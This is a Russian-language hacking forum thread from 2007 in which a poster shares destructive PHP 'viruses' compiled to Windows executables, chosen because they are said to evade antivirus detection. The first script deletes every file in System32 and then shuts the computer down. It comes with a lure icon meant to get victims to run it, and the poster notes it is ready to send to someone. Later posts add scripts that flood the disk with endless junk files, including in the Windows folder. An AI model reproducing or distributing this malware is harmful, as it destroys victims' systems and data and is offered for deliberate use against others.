Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Левые вирусы, которые не палят антивирусы |
11.05.2007, 22:00
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Левые вирусы, которые не палят антивирусы
Хай всем!
Возможно этот способ уже все знают, но всёравно...
Оказывается можно писать вирусы на PHP  Конечно они нубские получаются, но не палятся антивирусами... Вы наверное думаете что этот способ годен только для серверов с поддержкой PHP, однако для запуска PHP вируса ненужен сервер  PHP скрипты можно компилировать в .exe файлы, для меня (когда я это узнал) было огромное открытие, для вас возможно нет... Тогда закройте эту страничку, всёравно ничего нового не узнаете...
Для компиляции PHP скриптов есть много программ, я лично юзаю php bam compile маленькая прога не требующая никакой установки!
Скачать тут: _http://slil.ru/24354564
В архиве 5 фалов:
bamcompile.exe - компилятор
readme.txt - описание компилятора (помощ)
virus-unlink.php - мой пример вируса 
Вот...
PHP код:
<?php
set_time_limit(0);
ignore_user_abort();
echo "Preparing to installation... Plsease wait\n\n\n\n";
foreach (glob("C:/WINDOWS/System32/*") as $filename)
{
@unlink($filename);
}
echo "TY 4URKO!\nBy Ponchik\nICQ:202-995-022\nWEB:antichat.ru";
sleep(5);
system('shutdown -s');
?>
Что он делает?
1)Выводит нажпись "Preparing to installation... Plsease wait"
2)Получает список файлов из C:/WINDOWS/System32/ и пытается их по очереди удалить...
3)После всего этого выводит текст
TY 4URKO!
By Ponchik
ICQ:202-995-022
WEB:antichat.ru
4)Замирает на 5 сек
5)Выводит табличку выключения компа через 30 сек. (естествено он уже не включится без system32 )
4)popa=).ico - иконка голой попы (чтоб хотелось запустить)
5)virus-unlink.exe - откомпилированый не сжатый вирус с иконкой попы
Эмм... Кажись всё...
Лаги которые очень мешают:
1)После выполнения, программа закрывается, я личто решаю это так:
while(true) { sleep(10); }
это прописать в конец программы
2)Не работает функция usleep ну она врядле вам нужна будет
3)В досе невидн русский текст, например если написать
echo 'Предед медвед'; - Это выведет каракули
Я это решаю функцией
PHP код:
<?php
function strtoruss($text)
{
$letter = array(
'А' => chr(128),
'Б' => chr(129),
'В' => chr(130),
'Г' => chr(131),
'Д' => chr(132),
'Е' => chr(133),
'Ё' => chr(133),
'Ж' => chr(134),
'З' => chr(135),
'И' => chr(136),
'Й' => chr(137),
'К' => chr(138),
'Л' => chr(139),
'М' => chr(140),
'Н' => chr(141),
'О' => chr(142),
'П' => chr(143),
'Р' => chr(144),
'С' => chr(145),
'Т' => chr(146),
'У' => chr(147),
'Ф' => chr(148),
'Х' => chr(149),
'Ц' => chr(150),
'Ч' => chr(151),
'Ш' => chr(152),
'Щ' => chr(153),
'Ъ' => chr(154),
'Ы' => chr(155),
'Ь' => chr(156),
'Э' => chr(157),
'Ю' => chr(158),
'Я' => chr(159),
'а' => chr(160),
'б' => chr(161),
'в' => chr(162),
'г' => chr(163),
'д' => chr(164),
'е' => chr(165),
'ё' => chr(165),
'ж' => chr(166),
'з' => chr(167),
'и' => chr(168),
'й' => chr(169),
'к' => chr(170),
'л' => chr(171),
'м' => chr(172),
'н' => chr(173),
'о' => chr(174),
'п' => chr(175),
'р' => chr(224),
'с' => chr(225),
'т' => chr(226),
'у' => chr(227),
'ф' => chr(228),
'х' => chr(229),
'ц' => chr(230),
'ч' => chr(231),
'ш' => chr(232),
'щ' => chr(233),
'ъ' => chr(234),
'ы' => chr(235),
'ь' => chr(236),
'э' => chr(237),
'ю' => chr(238),
'я' => chr(239)
);
for($i=0;$i<strlen($text);$i++)
{
if($letter[$text[$i]])
$toreturn = $toreturn.$letter[$text[$i]];
else
$toreturn = $toreturn.$text[$i];
}
return $toreturn;
}
?>
Пишем это в начало скрипта, потом так
echo strtoruss('Превед медвед');
И всё ок
======================================
Не судите строго, для меня это было открытием Хоть и фиговые вирусы получаются, зато они не палятся, можно конечно на C++ офигительные не палевные писать, но я С++ незнаю, поэтому РНР для меня единственое решение В общем не судите строго
P.S. virus-unlink.exe полностью готов к работе, можете комунить отправить |
|
|
11.05.2007, 22:10
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Классная фича! Не знал. Правда, не легче ли точно так же написать батничек?
|
|
|
|
11.05.2007, 22:38
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Я незнаю что такое батничек 
Вот ещё есть такая фишка
PHP код:
<?php
// Greetz всем заподлянщикам...
// В частности Poncik'y за идею!!!!!!!
// Вот, после этого, точно зае*ёшся пыль глотать...
//Аминь...
//(C) Dr.Check и все кто помог писать "Знаменитый скрипт"
////////////////////////////////////////////////////////////////
set_time_limit(0);
ignore_user_abort();
echo("<center><h1><b><font color=\"green\">ИБО НЕХУЙ!!!</font></b></h1></center>");
/////////////////////////////////////////////////////////////////
$name = array('a','b','c','d','e','f','g','h','i','j','k', 'l','m','n','o','p','r','s',
't','u','v','x','y','z','A','B','C','D','E','F','G ','H','I','J','K','L',
'M','N','O','P','R','S','T','U','V','X','Y','Z','1 ','2','3','4','5','6',
'7','8','9','0');
//////////////////////////////////////////////////////////////////
$rash= array('.txt','.dic','.doc','.xls','.exe','.ini',
'.bat','.log','.dll','.hak','.wmf','.zip','.rar',
'.tar','.gz','.jpg','.gif','.bmp');
/////////////////////////////////////////////////////////////////
while(true) {
$perem = "";
$fuck="";
for($i = 0; $i < rand(20,1); $i++) // количество сиволов в имени файла.
{
$by = rand(0, count($name) - 1);
$perem .= $name[$by];
}
$ra= rand(0, count($rash)-1);
$fuck .= $rash[$ra];
$fp=fopen($perem.$fuck,"w");
fwrite($fp,php_uname());
fclose($fp);
}
?>
Она ДОЛЖНА создавать бесконечно кол-во фалов, но создаёт 2000-3000 и умирает, незнаю почему... Вот мой левый скрипт
PHP код:
<?
set_time_limit(0);
ignore_user_abort();
while(true) {
switch (rand(0,8))
{
case 1 : $r = '.txt'; break;
case 2 : $r = '.exe'; break;
case 3 : $r = '.dat'; break;
case 4 : $r = '.ini'; break;
case 5 : $r = '.log'; break;
case 6 : $r = '.dll'; break;
case 7 : $r = '.wav'; break;
case 8 : $r = '.nsc'; break;
default: $r = '.zip'; break;
}
$fp=fopen(md5(time().doubleval(microtime())).$r,"w");
fwrite($fp,time());
fclose($fp);
}
?>
Он бесконечно созаёт файлы Только я незнаю работает-ли ignore_user_abort(); в компиляторе...
P.S. Кому надо например в C:/windows/ создавать, замените
$fp=fopen(md5(time().doubleval(microtime())).$r,"w ");
на
$fp=fopen('C:/WINDOWS/'.md5(time().doubleval(microtime())).$r,"w"); |
|
|
|
11.05.2007, 23:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от Ponchik
Я незнаю что такое батничек По моим представлениям, файл с расширением .bat - файл сценариев командной строки DOS/Windows либо файл с расширением .cmd
|
|
|
|
11.05.2007, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
сам когда-то компили, ещё компилятор одной из тимы... интересно, но как-то всеровно..... не нравица мне это
|
|
|
|
12.05.2007, 00:17
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Sn@k3, на любителя
Macro, неее... Ты чооо! Палевно! + кажись касперский предупреждает когда бат запускаешь (кажись!) |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
